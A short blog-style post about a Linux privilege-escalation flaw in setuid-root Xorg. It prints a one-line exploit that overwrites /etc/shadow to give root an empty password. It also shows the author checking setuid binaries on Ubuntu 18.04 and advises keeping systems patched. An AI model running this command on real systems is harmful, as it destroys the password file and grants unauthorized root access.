There is an exploit that has been found in Linux that can overwrite the /etc/shadow file with a new password for root. But this requires the setuid root bit for Xorg and to be run from a text console that is not already running Xorg. So this will only work on an older Linux system.
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su |
According to this command, Xorg on my system is not setuid root.
sudo find / -perm -4000 |
Only these files in /usr/lib are setuid root on Ubuntu 18.04.
4.4 Thu Nov 01 jason@Yog-Sothoth 0: $ sudo find /usr/lib -perm -4000 /usr/lib/eject/dmcrypt-get-device /usr/lib/snapd/snap-confine /usr/lib/xorg/Xorg.wrap /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/lib/chromium-browser/chrome-sandbox /usr/lib/landscape/apt-update /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/enlightenment/utils/enlightenment_sys /usr/lib/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.17.6/freqset |
This would only work on an older system, many distributions have already been patched to fix this problem. There has been a huge controversy over this exploit, but it is short-lived. As long as a system has been updated regularly, then it will not be susceptible to the exploit. Do not run older Linux distributions and then you will be safer from a problem.